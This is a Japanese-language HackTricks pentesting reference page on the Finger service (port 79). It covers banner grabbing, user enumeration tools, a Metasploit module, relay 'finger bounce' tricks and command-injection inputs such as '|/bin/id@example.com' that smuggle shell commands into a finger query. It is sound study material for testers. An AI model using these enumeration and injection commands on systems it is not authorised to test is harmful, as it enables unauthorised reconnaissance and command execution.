hacktricks/network-services-pentesting/pentesting-finger.md

4.2 KiB
Raw Blame History

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

基本情報

Finger プログラム/サービスは、コンピュータユーザーに関する詳細を取得するために利用されます。通常、提供される情報には ユーザーのログイン名、フルネーム、および場合によっては追加の詳細が含まれます。これらの追加の詳細には、オフィスの場所や電話番号(利用可能な場合)、ユーザーがログインした時間、非アクティブ期間(アイドル時間)、ユーザーが最後にメールを読んだ時刻、ユーザーのプランやプロジェクトファイルの内容が含まれることがあります。

デフォルトポート: 79

PORT   STATE SERVICE
79/tcp open  finger

列挙

バナー取得/基本接続

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

ユーザー列挙

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

代わりに、pentestmonkeyからfinger-user-enumを使用できます。いくつかの例:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmapはデフォルトスクリプトを使用してスクリプトを実行します

MetasploitはNmapよりも多くのトリックを使用します

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

コマンド実行

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

システムをフィンガーリレーとして使用する

finger user@host@victim
finger @internal@external

{% hint style="success" %} AWSハッキングを学び、実践するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践するHackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする
{% endhint %}